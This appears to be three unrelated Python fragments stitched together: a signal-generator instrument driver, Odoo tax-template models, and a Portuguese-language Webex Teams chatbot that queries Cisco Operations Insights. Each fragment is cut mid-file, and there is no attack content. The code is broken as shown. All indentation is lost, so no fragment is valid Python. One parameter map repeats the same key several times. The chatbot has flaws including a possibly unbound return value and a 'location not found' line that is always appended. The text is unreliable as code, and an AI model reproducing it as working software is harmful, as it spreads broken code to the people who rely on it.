flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
units='dBm', minval=-110, maxval=16.5, type=types.FloatType)
self.add_parameter('phase',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
units='deg', minval=-360, maxval=360, type=types.FloatType)
self.add_parameter('frequency', format='%.09e',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
units='Hz', minval=0, maxval=6.075e9, type=types.FloatType)
#cache_time=1.) # <-- cache because this is queried a lot when setting other params
self.add_parameter('dc_offset',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
units='V', minval=-1.5, maxval=1.5, type=types.FloatType)
self.add_parameter('idn', flags=Instrument.FLAG_GET, type=types.StringType)
self.add_parameter('temperature', flags=Instrument.FLAG_GET, units='deg C', type=types.FloatType)
self.add_parameter('status',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.StringType,
format_map={'on': 'output on',
'off': 'output off'})
self.add_parameter('modulation',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.IntType,
format_map={-1: 'no modulation',
0: 'AM / ASK',
1: 'FM / FSK',
2: 'phase / PSK',
3: 'sweep',
4: 'pulse',
5: 'blank',
7: 'QAM',
8: 'CPM',
9: 'VSB'})
self.add_parameter('modulation_subtype',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.IntType,
format_map={0: 'analog (no constellation mapping)',
1: 'vector (no constellation mapping)',
2: 'default 1-bit constellation',
3: 'default 2-bit constellation',
4: 'default 3-bit constellation',
5: 'default 4-bit constellation',
6: 'default 5-bit constellation',
7: 'default 6-bit constellation',
8: 'default 7-bit constellation',
9: 'default 8-bit constellation',
10: 'default 9-bit constellation',
1: 'user constellation',
1: 'factory OQPSK constellation',
1: 'factory QPSK constellation',
1: 'factory pi/4 DQPSK constellation',
1: 'factor 3pi/8 8PSK constellation'})
self.add_parameter('external_modulation_coupling',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.IntType,
format_map={0: 'AC (4 Hz high-pass)',
1: 'DC'})
self.add_parameter('pulse_modulation',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.IntType,
format_map={3: 'square',
4: 'noise (PRBS)',
5: 'external',
11: 'user waveform'})
self.add_parameter('pulse_modulation_width', format='%.09e',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
units='s', minval=1e-6, maxval=10., type=types.FloatType)
self.add_parameter('pulse_modulation_period', format='%.09e',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
units='s', minval=1e-6, maxval=10., type=types.FloatType)
self.add_parameter('am_modulation_depth',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, units='%', minval=0, maxval=100., type=types.FloatType)
self.add_parameter('timebase',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.IntType,
format_map={0: 'crystal',
1: 'OCXO',
2: 'rubidium',
3: 'external'})
self.add_parameter('noise_mode',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.IntType,
format_map={0: 'optimized for less than 100 kHz from carrier',
1: 'optimized for more than 100 kHz from carrier'})
status_codes ={0: 'normal',
1: '20 MHz PLL unlocked',
2: '100 MHz PLL unlocked',
4: '19 MHz PLL unlocked',
8: '1 GHz PLL unlocked',
16: '4 GHz PLL unlocked',
32: 'no timebase',
64: 'rubidium oscillator unlocked',
128: 'reserved status code',
256: 'modulation overloaded',
512: 'IQ modulation overloaded'}
self.__all_status_combinations = dict(
(status, ', '.join( status_codes[2**j] for j in range(0,8) if ((status>>j)&1) ))
for status in range(1, 2**8)
)
self.__all_status_combinations[0] = status_codes[0]
self.add_parameter('status_code',
flags=Instrument.FLAG_GET, type=types.IntType,
format_map=self.__all_status_combinations)
self.add_function('reset')
self.add_function ('get_all')
if (reset):
self.reset()
else:
self.get_all()
except:
self._visainstrument.close()
raise
def reset(self):
'''
Resets the instrument to default values.
'''
logging.info(__name__ + ' : resetting instrument')
self._visainstrument.write('*RST')
self.set_status('off')
self.set_power(-30)
self.get_all()
def self_test(self):
'''
Run the self test and report errors.
'''
logging.info(__name__ + ' : self testing')
errors = self._visainstrument.ask('*TST?')
if errors.strip() != '0':
logging.warn('Self test returned the following errors!:')
assert errors.strip() == '17', 'Self test should return either 0 or 17.'
self.check_for_errors()
self.set_status('off')
self.set_power(-30)
logging.warn('Self test done. The status byte will show that the PLLs came unlocked but that\'s normal (on first read).')
self.get_all()
def check_for_errors(self):
'''
Check the error queue.
'''
for i in range(1000):
err = self._visainstrument.ask('LERR?')
if err.strip() == '0':
return
else:
logging.warn('error_buffer[-%d] = %s (see manual p. 126)', i, err)
qt.msleep(0.2)
def get_all(self):
'''
Reads all implemented parameters.
'''
logging.info(__name__ + ' : get all')
self.get_idn()
self.get_power()
self.get_dc_offset()
self.get_phase()
self.get_frequency()
self.get_status()
self.get_external_modulation_coupling()
self.get_modulation()
self.get_modulation_subtype()
self.get_am_modulation_depth()
self.get_pulse_modulation()
self.get_pulse_modulation_width()
self.get_pulse_modulation_period()
self.get_noise_mode()
self.get_timebase()
self.get_status_code()
self.get_temperature()
self.check_for_errors()
def __to_rounded_string(self, x, decimals, significant_figures):
''' Round x to the specified number of decimals and significant figures.
Output a warning if rounded value is not equal to x. '''
rounded = ('%.{0}e'.format(significant_figures-1)) % ( np.round(x, decimals=decimals) )
if np.abs(float(rounded) - x) > np.finfo(np.float).tiny:
logging.warn('Rounding the requested value (%.20e) to %s (i.e. by %.20e).',
x, rounded, x - float(rounded))
return rounded
def do_get_idn(self):
'''
Get a string identifying the instrument.
'''
return self._visainstrument.ask('*IDN?')
def do_get_temperature(self):
'''
Temperature of the RF output block in deg C.
'''
return self._visainstrument.ask('TEMP?')
def do_get_power(self):
'''
Reads the power of the signal in dBm.
'''
logging.debug(__name__ + ' : get power')
return float(self._visainstrument.ask('AMPR?'))
def do_set_power(self, amp):
'''
Set the power of the signal in dBm.
'''
p = self.__to_rounded_string(amp, 2, 6)
logging.debug(__name__ + ' : set power to %s' % p)
max_power = min(16.5, 16.5 - (self.get_frequency() - 4e9)/1e9 * 3.25)
if float(p) > max_power:
logging.warn('Trying to set %s dBm but the maximum power at %g Hz is %g dBm',
p, self.get_frequency(), max_power)
if self.get_frequency() >= self.MIN_N_FREQ: self._visainstrument.write('AMPR %s' % p)
if self.get_frequency() <= self.MAX_BNC_FREQ: self._visainstrument.write('AMPL %s' % p)
def do_get_dc_offset(self):
'''
Reads the DC offset of the BNC output in V.
'''
logging.debug(__name__ + ' : get dc_offset')
return float(self._visainstrument.ask('OFSL?'))
def do_set_dc_offset(self, off):
'''
Set the DC offset of the BNC output in V.
'''
p = self.__to_rounded_string(off, 2, 6)
logging.debug(__name__ + ' : set dc_offset to %s' % p)
power_in_Vrms = 1.00 * 10**((self.get_power()-13.01) / 20)
max_dc_offset = 1.5 * min(1, 1 - (power_in_Vrms-0.224)/(1-0.224) )
if np.abs(float(p)) > max_dc_offset:
logging.warn('Trying to set %s V but the maximum DC offset at %g dBm AC power is %g V',
p, self.get_power(), max_dc_offset)
self._visainstrument.write('OFSL %s' % p)
def do_get_phase(self):
'''
Reads the phase of the signal in degrees.
'''
logging.debug(__name__ + ' : get phase')
return float(self._visainstrument.ask('PHAS?'))
def do_set_phase(self, v):
'''
Set the phase of the signal in degress.
'''
if self.get_frequency() <= 100e6: p = self.__to_rounded_string(v, 2, 10)
elif self.get_frequency() <= 1e9: p = self.__to_rounded_string(v, 1, 10)
else: p = self.__to_rounded_string(v, 0, 10)
logging.debug(__name__ + ' : set phase to %s' % p)
self._visainstrument.write('PHAS %s' % p)
def do_get_frequency(self):
'''
Reads the frequency of the signal in Hz.
'''
logging.debug(__name__ + ' : get frequency')
return float(self._visainstrument.ask('FREQ?'))
def do_set_frequency(self, freq):
'''
Set the frequency in Hz.
'''
logging.debug(__name__ + ' : set frequency to %s' % freq)
self._visainstrument.write('FREQ %s' %
self.__to_rounded_string(freq, decimals=6, significant_figures=17))
def do_get_status(self):
'''
Reads the output status ("on" or "off" for the BNC and N outputs).
'''
logging.debug(__name__ + ' : get status')
stat_l = self._visainstrument.ask('ENBL?').strip() == '1'
stat_r = self._visainstrument.ask('ENBR?').strip() == '1'
return 'BNC %s, N %s' % ('on' if stat_l else 'off', 'on' if stat_r else 'off')
def do_set_status(self, status):
'''
Sets the output status ("on" or "off").
Sets both the BNC and N outputs whenever the frequency allows it.
'''
s = int(bool( (status.lower().strip() in ['1', 'on']) ))
logging.debug(__name__ + ' : set status to %s' % s)
if self.get_frequency() >= self.MIN_N_FREQ: self._visainstrument.write('ENBR %s' % s)
if self.get_frequency() <= self.MAX_BNC_FREQ: self._visainstrument.write('ENBL %s' % s)
def do_get_modulation(self):
'''
Gets the modulation mode (and whether modulation is enabled at all).
'''
if not (self._visainstrument.ask('MODL?').strip() == '1'): return -1
return self._visainstrument.ask('TYPE?')
def do_set_modulation(self, v):
'''
Sets the modulation mode (and turns modulation on), unless v == -1 which disables modulation.
'''
assert v in [-1,0,1,2,3,4,5,7,8,9], 'Unknown modulation type %s (see manual p. 114).' % v
if v != -1: self._visainstrument.write('TYPE %d' % v)
self._visainstrument.write('MODL %d' % (0 if v == -1 else 1))
def do_get_modulation_subtype(self):
| |
invoice is validated.\n"
"Based on Payment: the tax is due as soon as the payment of the invoice is received.")
cash_basis_transition_account_id = fields.Many2one(
comodel_name='account.account.template',
string="Cash Basis Transition Account",
domain=[('deprecated', '=', False)],
help="Account used to transition the tax amount for cash basis taxes. It will contain the tax amount as long as the original invoice has not been reconciled ; at reconciliation, this amount cancelled on this account and put on the regular tax account.")
cash_basis_base_account_id = fields.Many2one(
'account.account.template',
domain=[('deprecated', '=', False)],
string='Base Tax Received Account',
help='Account that will be set on lines created in cash basis journal entry and used to keep track of the tax base amount.')
_sql_constraints = [
('name_company_uniq', 'unique(name, type_tax_use, chart_template_id)', 'Tax names must be unique !'),
]
@api.depends('name', 'description')
def name_get(self):
res = []
for record in self:
name = record.description and record.description or record.name
res.append((record.id, name))
return res
def _get_tax_vals(self, company, tax_template_to_tax):
""" This method generates a dictionary of all the values for the tax that will be created.
"""
# Compute children tax ids
children_ids = []
for child_tax in self.children_tax_ids:
if tax_template_to_tax.get(child_tax.id):
children_ids.append(tax_template_to_tax[child_tax.id])
self.ensure_one()
val = {
'name': self.name,
'type_tax_use': self.type_tax_use,
'amount_type': self.amount_type,
'active': self.active,
'company_id': company.id,
'sequence': self.sequence,
'amount': self.amount,
'description': self.description,
'price_include': self.price_include,
'include_base_amount': self.include_base_amount,
'analytic': self.analytic,
'children_tax_ids': [(6, 0, children_ids)],
'tax_exigibility': self.tax_exigibility,
}
# We add repartition lines if there are some, so that if there are none,
# default_get is called and creates the default ones properly.
if self.invoice_repartition_line_ids:
val['invoice_repartition_line_ids'] = self.invoice_repartition_line_ids.get_repartition_line_create_vals(company)
if self.refund_repartition_line_ids:
val['refund_repartition_line_ids'] = self.refund_repartition_line_ids.get_repartition_line_create_vals(company)
if self.tax_group_id:
val['tax_group_id'] = self.tax_group_id.id
return val
def _generate_tax(self, company):
""" This method generate taxes from templates.
:param company: the company for which the taxes should be created from templates in self
:returns: {
'tax_template_to_tax': mapping between tax template and the newly generated taxes corresponding,
'account_dict': dictionary containing a to-do list with all the accounts to assign on new taxes
}
"""
# default_company_id is needed in context to allow creation of default
# repartition lines on taxes
ChartTemplate = self.env['account.chart.template'].with_context(default_company_id=company.id)
todo_dict = {'account.tax': {}, 'account.tax.repartition.line': {}}
tax_template_to_tax = {}
templates_todo = list(self)
while templates_todo:
templates = templates_todo
templates_todo = []
# create taxes in batch
tax_template_vals = []
for template in templates:
if all(child.id in tax_template_to_tax for child in template.children_tax_ids):
vals = template._get_tax_vals(company, tax_template_to_tax)
tax_template_vals.append((template, vals))
else:
# defer the creation of this tax to the next batch
templates_todo.append(template)
taxes = ChartTemplate._create_records_with_xmlid('account.tax', tax_template_vals, company)
# fill in tax_template_to_tax and todo_dict
for tax, (template, vals) in zip(taxes, tax_template_vals):
tax_template_to_tax[template.id] = tax.id
# Since the accounts have not been created yet, we have to wait before filling these fields
todo_dict['account.tax'][tax.id] = {
'cash_basis_transition_account_id': template.cash_basis_transition_account_id.id,
'cash_basis_base_account_id': template.cash_basis_base_account_id.id,
}
# We also have to delay the assignation of accounts to repartition lines
# The below code assigns the account_id to the repartition lines according
# to the corresponding repartition line in the template, based on the order.
# As we just created the repartition lines, tax.invoice_repartition_line_ids is not well sorted.
# But we can force the sort by calling sort()
all_tax_rep_lines = tax.invoice_repartition_line_ids.sorted() + tax.refund_repartition_line_ids.sorted()
all_template_rep_lines = template.invoice_repartition_line_ids + template.refund_repartition_line_ids
for i in range(0, len(all_template_rep_lines)):
# We assume template and tax repartition lines are in the same order
template_account = all_template_rep_lines[i].account_id
if template_account:
todo_dict['account.tax.repartition.line'][all_tax_rep_lines[i].id] = {
'account_id': template_account.id,
}
if any(template.tax_exigibility == 'on_payment' for template in self):
# When a CoA is being installed automatically and if it is creating account tax(es) whose field `Use Cash Basis`(tax_exigibility) is set to True by default
# (example of such CoA's are l10n_fr and l10n_mx) then in the `Accounting Settings` the option `Cash Basis` should be checked by default.
company.tax_exigibility = True
return {
'tax_template_to_tax': tax_template_to_tax,
'account_dict': todo_dict
}
# Tax Repartition Line Template
class AccountTaxRepartitionLineTemplate(models.Model):
_name = "account.tax.repartition.line.template"
_description = "Tax Repartition Line Template"
factor_percent = fields.Float(string="%", required=True, help="Factor to apply on the account move lines generated from this repartition line, in percents")
repartition_type = fields.Selection(string="Based On", selection=[('base', 'Base'), ('tax', 'of tax')], required=True, default='tax', help="Base on which the factor will be applied.")
account_id = fields.Many2one(string="Account", comodel_name='account.account.template', help="Account on which to post the tax amount")
invoice_tax_id = fields.Many2one(comodel_name='account.tax.template', help="The tax set to apply this repartition on invoices. Mutually exclusive with refund_tax_id")
refund_tax_id = fields.Many2one(comodel_name='account.tax.template', help="The tax set to apply this repartition on refund invoices. Mutually exclusive with invoice_tax_id")
tag_ids = fields.Many2many(string="Financial Tags", relation='account_tax_repartition_financial_tags', comodel_name='account.account.tag', copy=True, help="Additional tags that will be assigned by this repartition line for use in financial reports")
# These last two fields are helpers used to ease the declaration of account.account.tag objects in XML.
# They are directly linked to account.tax.report.line objects, which create corresponding + and - tags
# at creation. This way, we avoid declaring + and - separately every time.
plus_report_line_ids = fields.Many2many(string="Plus Tax Report Lines", relation='account_tax_repartition_plus_report_line', comodel_name='account.tax.report.line', copy=True, help="Tax report lines whose '+' tag will be assigned to move lines by this repartition line")
minus_report_line_ids = fields.Many2many(string="Minus Report Lines", relation='account_tax_repartition_minus_report_line', comodel_name='account.tax.report.line', copy=True, help="Tax report lines whose '-' tag will be assigned to move lines by this repartition line")
@api.model
def create(self, vals):
if vals.get('plus_report_line_ids'):
vals['plus_report_line_ids'] = self._convert_tag_syntax_to_orm(vals['plus_report_line_ids'])
if vals.get('minus_report_line_ids'):
vals['minus_report_line_ids'] = self._convert_tag_syntax_to_orm(vals['minus_report_line_ids'])
if vals.get('tag_ids'):
vals['tag_ids'] = self._convert_tag_syntax_to_orm(vals['tag_ids'])
return super(AccountTaxRepartitionLineTemplate, self).create(vals)
@api.model
def _convert_tag_syntax_to_orm(self, tags_list):
""" Repartition lines give the possibility to directly give
a list of ids to create for tags instead of a list of ORM commands.
This function checks that tags_list uses this syntactic sugar and returns
an ORM-compliant version of it if it does.
"""
if tags_list and all(isinstance(elem, int) for elem in tags_list):
return [(6, False, tags_list)]
return tags_list
@api.constrains('invoice_tax_id', 'refund_tax_id')
def validate_tax_template_link(self):
for record in self:
if record.invoice_tax_id and record.refund_tax_id:
raise ValidationError(_("Tax repartition line templates should apply to either invoices or refunds, not both at the same time. invoice_tax_id and refund_tax_id should not be set together."))
@api.constrains('plus_report_line_ids', 'minus_report_line_ids')
def validate_tags(self):
all_tax_rep_lines = self.mapped('plus_report_line_ids') + self.mapped('minus_report_line_ids')
lines_without_tag = all_tax_rep_lines.filtered(lambda x: not x.tag_name)
if lines_without_tag:
raise ValidationError(_("The following tax report lines are used in some tax repartition template though they don't generate any tag: %s . This probably means you forgot to set a tag_name on these lines.") % str(lines_without_tag.mapped('name')))
def get_repartition_line_create_vals(self, company):
rslt = [(5, 0, 0)]
for record in self:
tags_to_add = self.env['account.account.tag']
tags_to_add += record.plus_report_line_ids.mapped('tag_ids').filtered(lambda x: not x.tax_negate)
tags_to_add += record.minus_report_line_ids.mapped('tag_ids').filtered(lambda x: x.tax_negate)
tags_to_add += record.tag_ids
rslt.append((0, 0, {
'factor_percent': record.factor_percent,
'repartition_type': record.repartition_type,
'tag_ids': [(6, 0, tags_to_add.ids)],
'company_id': company.id,
}))
return rslt
# Fiscal Position Templates
class AccountFiscalPositionTemplate(models.Model):
_name = 'account.fiscal.position.template'
_description = 'Template for Fiscal Position'
sequence = fields.Integer()
name = fields.Char(string='Fiscal Position Template', required=True)
chart_template_id = fields.Many2one('account.chart.template', string='Chart Template', required=True)
account_ids = fields.One2many('account.fiscal.position.account.template', 'position_id', string='Account Mapping')
tax_ids = fields.One2many('account.fiscal.position.tax.template', 'position_id', string='Tax Mapping')
note = fields.Text(string='Notes')
auto_apply = fields.Boolean(string='Detect Automatically', help="Apply automatically this fiscal position.")
vat_required = fields.Boolean(string='VAT required', help="Apply only if partner has a VAT number.")
country_id = fields.Many2one('res.country', string='Country',
help="Apply only if delivery or invoicing country match.")
country_group_id = fields.Many2one('res.country.group', string='Country Group',
help="Apply only if delivery or invoicing country match the group.")
state_ids = fields.Many2many('res.country.state', string='Federal States')
zip_from = fields.Char(string='Zip Range From')
zip_to = fields.Char(string='Zip Range To')
class AccountFiscalPositionTaxTemplate(models.Model):
_name = 'account.fiscal.position.tax.template'
_description = 'Tax Mapping Template of Fiscal Position'
_rec_name = 'position_id'
position_id = fields.Many2one('account.fiscal.position.template', string='Fiscal Position', required=True, ondelete='cascade')
tax_src_id = fields.Many2one('account.tax.template', string='Tax Source', required=True)
tax_dest_id = fields.Many2one('account.tax.template', string='Replacement Tax')
class AccountFiscalPositionAccountTemplate(models.Model):
_name = 'account.fiscal.position.account.template'
_description = 'Accounts Mapping Template of Fiscal Position'
_rec_name = 'position_id'
position_id = fields.Many2one('account.fiscal.position.template', string='Fiscal Mapping', required=True, ondelete='cascade')
account_src_id = fields.Many2one('account.account.template', string='Account Source', required=True)
account_dest_id = fields.Many2one('account.account.template', string='Account Destination', required=True)
class AccountReconcileModelTemplate(models.Model):
_name = "account.reconcile.model.template"
_description = 'Reconcile Model Template'
# Base fields.
chart_template_id = fields.Many2one('account.chart.template', string='Chart Template', required=True)
name = fields.Char(string='Button Label', required=True)
sequence = fields.Integer(required=True, default=10)
rule_type = fields.Selection(selection=[
('writeoff_button', 'Manually create a write-off on clicked button.'),
('writeoff_suggestion', 'Suggest a write-off.'),
('invoice_matching', 'Match existing invoices/bills.')
], string='Type', default='writeoff_button', required=True)
auto_reconcile = fields.Boolean(string='Auto-validate',
help='Validate the statement line automatically (reconciliation based on your rule).')
to_check = fields.Boolean(string='To Check', default=False, help='This matching rule | |
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
import json
import os
import requests
from webexteamssdk import WebexTeamsAPI
# CHAT BOT v3.0.0
# Integracao Cisco Operations Insights & Webex Teams & CMX
# (c) 2019
# <NAME>
# <NAME>
# <NAME>
# <NAME>
#########################################################
## VAR FIXAS
# infobot
api = WebexTeamsAPI(access_token='<KEY>')
# Webhook
webhook_url="https://webexteamsmsg.herokuapp.com"
webhook_name="chatops"
botmail="<EMAIL>"
#########################################################
## FUNCOES
### WEBEX TEAMS
def CriaWebhook(webhook_name,webhook_url):
# Cria Webhook para receber msg via POST
# Avisa Teams para gerar hooks para mensagems criadas somente
# Webhook para msgs
api.webhooks.create(webhook_name,webhook_url,"messages","created")
# Webhook para nova sala criada - boas vindas
api.webhooks.create(webhook_name+"-new",webhook_url,"rooms","created")
return
def webexME():
# detalhes sobre mim
data = api.people.me()
return data
def WebexRoomCreate(name):
# Cria Sala Webex e retorna ID da sala, name aqui e' o nome da Sala
api.rooms.create(name)
# Encontra roomID da sala para devolver
novasala = getwebexRoomID(name)
return novasala
def WebexRoomDel(id):
#Remove sala Webex,id aqui e' roomID
api.rooms.delete(id)
return
def WebexIncUser(sala,mail):
#Inclui usuario como membro da sala, criando sala caso nao exista
# Descobri roomID da sala (sala e' o nome completo ou parte dela)
salaaincluir=getwebexRoomID(sala)
# Cria sala caso esta nao exista
if salaaincluir == None:
salaaincluir = WebexRoomCreate(sala)
useraincluir=getwebexUserID(mail)
# inclui usuario caso id encontrado
if useraincluir !=None:
#executa a operacao
api.memberships.create(salaaincluir,useraincluir)
return
def webexUser(mail):
# pesquisa ID do usuário e retorna MSG
usuario = api.people.list(email=mail)
user=None
for inter in usuario:
user = inter.id
if user !=None:
resultado = "Usuario "+str(mail)+" ID e' "+user
else:
resultado = "Nenhum Usuario encontrado para "+str(mail)
return resultado
def getwebexUserID(mail):
# pesquisa ID do usuário; retorna vazio se nao encontrado
usuario = api.people.list(email=mail)
user=None
for x in usuario:
user = x.id
if user !=None:
resultado = user
return resultado
def webexRoomsList():
# lista salas que pertenco
rooms=api.rooms.list()
resultado = ""
for room in rooms:
resultado = resultado + "Sala " + str(room.title) + " ID: " + str(room.id)+ "\n"
return resultado
def getwebexRoomID(sala):
# Retorna ID da Sala; retorna vazio se nao encontrado
# O parametro sala e' todo ou parte do nome da sala procurada
# Salas que pertenco
rooms=api.rooms.list()
salawebex = None
# for para encontrar ID da sala determinada
for room in rooms:
if sala in room.title:
salawebex = room
break
# mandando uma mensagem para a Sala caso encontrada:s
if salawebex != None:
resultado = (str(salawebex.id))
else:
resultado = salawebex
return resultado
def getwebexMsg(msgID):
# msgID é o parametro resgatado do corpo do webhook
# Retorna lista com o [0]texto da mensagem informada [1]ID da sala e [2]email da pessoa
mensagem=api.messages.get(msgID)
return mensagem.text,mensagem.roomId,mensagem.personEmail
def webexmsgRoom(sala,msg):
# Manda msg para 1 sala especifica, procurando salas onde estou (usando partes do nome informado em sala)
rooms=api.rooms.list()
salawebex = None
salawebex = getwebexRoomID(sala)
# mandando uma mensagem para a Sala caso encontrada:
if salawebex != None:
api.messages.create(salawebex,None,None,msg)
return
def webexmsgRoomviaID(sala,msg):
# Manda msg para 1 sala especifica informada via sala=roomID,
api.messages.create(sala,None,None,msg)
return
def webexmsgAll(msg):
# mensagem em todas as salas que estou
#
rooms=api.rooms.list()
for room in rooms:
api.messages.create(room.id,None,None,msg)
return
### OPERATIONS INSIGHTS
def OpiCategorySearch(textosearch):
# Faz uma pesquisa no Operation Insights por Categorias existentes
# Parte 1 - pede Token para o OPI
url = "https://opinsights.cisco.com/api/am/v1/auth/license/accesstoken"
headers = {'Content-type': "application/json" , 'Authorization':'JWT <KEY>' }
# response = valor HTTP (nao usado ainda) e conteudo e' o conteudo de fato, covertendo em json
response = requests.request("GET", url, headers=headers)
conteudo=json.loads(response.content)
# resultado do token
token='JWT ' + str(conteudo['token'])
# Parte 2 - Consulta assets usando o Token
url = "https://opinsights.cisco.com/api/am/v1/entities/access/categories"
headers = { 'Content-type': "application/json" , 'Authorization': ''+token }
# response = valor HTTP (nao usado ainda) e conteudo e' o conteudo de fato, covertendo em json
response = requests.request("GET", url, headers=headers)
Jdata=json.loads(response.content)
# Laco que Faz a pesquisa baseado no grupo do dispositivo da base acima
# Permite procurar tudo caso esta keyword seja usada
if textosearch == "tudo":
textosearch = ""
resultado = ""
count = 0
for items in Jdata:
msg=""
if textosearch in str(items['department']['name']).lower() or textosearch in str(items['name']).lower():
#constroi saida de texto
msg=msg+str("Nome:"+str(items['name'])+". Departamento: "+str(items['department']['name'])+"\n")
count=count+1
resultado = resultado + msg
resultado = resultado + "\n"+str(count)+" Categorias Encontradas"
return resultado
def OpiAssetDetail(textosearch):
# Pesquisa detalhes de um asset
# Parte 1 - pede Token para o OPI
url = "https://opinsights.cisco.com/api/am/v1/auth/license/accesstoken"
headers = {'Content-type': "application/json" , 'Authorization':'JWT <KEY>' }
# response = valor HTTP (nao usado ainda) e conteudo e' o conteudo de fato, covertendo em json
response = requests.request("GET", url, headers=headers)
conteudo=json.loads(response.content)
# resultado do token
token='JWT ' + str(conteudo['token'])
# Parte 2 - Consulta assets usando o Token
url = "https://opinsights.cisco.com/api/am/v1/entities/access/assets"
headers = { 'Content-type': "application/json" , 'Authorization': ''+token }
# response = valor HTTP (nao usado ainda) e conteudo e' o conteudo de fato, covertendo em json
response = requests.request("GET", url, headers=headers)
Jdata=json.loads(response.content)
# Laco que Faz a pesquisa baseado no grupo do dispositivo da base acima
resultado=""
for items in Jdata:
msg=""
if textosearch in str(items['serial']).lower():
# Caso positivo encontrado monta a resposta
msg=msg+str("Asset:"+str(items['serial'])+"\n")
msg=msg+str("Serial: "+str(items['tags'][0]['serial'])+"\n")
msg=msg+str("Tipo: "+str(items['tags'][0]['type'])+"\n")
msg=msg+str("Categoria: "+str(items['category']['name'])+"\n")
msg=msg+str("Local:"+str(items['site']['name'])+"\n")
msg=msg+str("Departamento:"+str(items['department']['name'])+"\n")
# Devolve a zona identificada pelo Insights, caso exista
try:
zona=str(items['location']['zones'][0]['name'])
msg=msg+str("Local: Sala "+str(zona)+"\n")
except:
pass
msg=msg+str("Local não encontrado\n")
resultado=resultado+str(msg)
if resultado=="":
resultado="Nenhum Asset encontrado"
return resultado
def OpiFindAssets(textosearch):
# Faz uma pesquisa no Operation Insights
# Parte 1 - pede Token para o OPI
url = "https://opinsights.cisco.com/api/am/v1/auth/license/accesstoken"
headers = {'Content-type': "application/json" , 'Authorization':'JWT <KEY>' }
# response = valor HTTP (nao usado ainda) e conteudo e' o conteudo de fato, covertendo em json
response = requests.request("GET", url, headers=headers)
conteudo=json.loads(response.content)
# resultado do token
token='JWT ' + str(conteudo['token'])
# Parte 2 - Consulta assets usando o Token
url = "https://opinsights.cisco.com/api/am/v1/entities/access/assets"
headers = { 'Content-type': "application/json" , 'Authorization': ''+token }
# response = valor HTTP (nao usado ainda) e conteudo e' o conteudo de fato, covertendo em json
response = requests.request("GET", url, headers=headers)
Jdata=json.loads(response.content)
# Laco que Faz a pesquisa baseado no grupo do dispositivo da base acima
# Permite procurar tudo caso esta keyword seja usada
if textosearch == "tudo":
textosearch = ""
resultado = ""
count = 0
for items in Jdata:
msg=""
if textosearch in str(items['tags'][0]['type']).lower() or textosearch in str(items['category']['name']).lower() or textosearch in str(items['serial']).lower():
count = count +1
# Caso encontrado monta a resposta
msg=msg+str(str(count)+")Asset:"+str(items['serial'])+" Categoria: "+str(items['category']['name'])+" . ")
try:
zona=str(items['location']['zones'][0]['name'])
msg=msg+str("Local: Sala "+str(zona)+"\n")
except:
pass
msg=msg+str("Local não encontrado\n")
resultado = resultado + str(msg)
resultado = resultado + "\n"+str(count)+" Assets Encontrados"
return resultado
def procura(textosearch):
# DEPRECADO - NAO USADO MAIS
# Faz uma pesquisa no Operation Insights
# Parte 1 - pede Token para o OPI
url = "https://opinsights.cisco.com/api/am/v1/auth/license/accesstoken"
headers = {'Content-type': "application/json" , 'Authorization':'JWT <KEY>' }
# response = valor HTTP (nao usado ainda) e conteudo e' o conteudo de fato, covertendo em json
response = requests.request("GET", url, headers=headers)
conteudo=json.loads(response.content)
# resultado do token
token='JWT ' + str(conteudo['token'])
# Parte 2 - Consulta assets usando o Token
url = "https://opinsights.cisco.com/api/am/v1/entities/access/assets"
headers = { 'Content-type': "application/json" , 'Authorization': ''+token }
# response = valor HTTP (nao usado ainda) e conteudo e' o conteudo de fato, covertendo em json
response = requests.request("GET", url, headers=headers)
Jdata=json.loads(response.content)
# Laco que Faz a pesquisa baseado no grupo do dispositivo da base acima
# Permite procurar tudo caso esta keyword seja usada
#if textosearch == "tudo":
# textosearch = ""
# Tudo não rola por causa do limite do Webex teams de caracteres DV
resultado = ""
msg=""
count = 0
for items in Jdata:
if textosearch in str(items['tags'][0]['type']) or textosearch in str(items['category']['name']):
# Caso encontrado monta a resposta
msg=msg+str("----------------------------------------------------\n")
msg=msg+str("local:"+str(items['site']['name'])+"\n")
msg=msg+str("nome do asset:"+str(items['serial'])+"\n")
#msg=msg+str("localizacao x:"+str(items['location']['x'])+" y: "+str(items['location']['y'])+"\n")
msg=msg+str("estado: "+str(items['status'])+"\n")
msg=msg+str("serial: "+str(items['tags'][0]['serial'])+"\n")
msg=msg+str("tipo: "+str(items['tags'][0]['type'])+"\n")
msg=msg+str("categoria: "+str(items['category']['name'])+"\n")
count=count+1
resultado = resultado + str(msg)
resultado = resultado + "\n"+str(count)+" Assets Encontrados"
return resultado
def webextalk(msg_id):
# Camada de interação com o usuário conversando com o BOT
# chama funcao para resgatar detalhes da mensagem (via id)
dados = getwebexMsg(msg_id)
# armazena o texto da msg enviada pelo usuario
# box e' o que o user escreveu
box=dados[0]
# armazena o id sala usada para devolver para mesma
idsala=dados[1]
# armazena email de quem enviou - nao utilizado ainda
usermail=dados[2]
# Para o caso de nenhum pedido coberto aqui
msg="Nao entendi seu pedido"
# Splita para encontrar detalhes dos parametros
sp=box.split(" ")
box=sp[0]
# converte para minusculas
box=box.lower()
# chamadas de acordo com os parametros
if box == "ajuda" or box =="help":
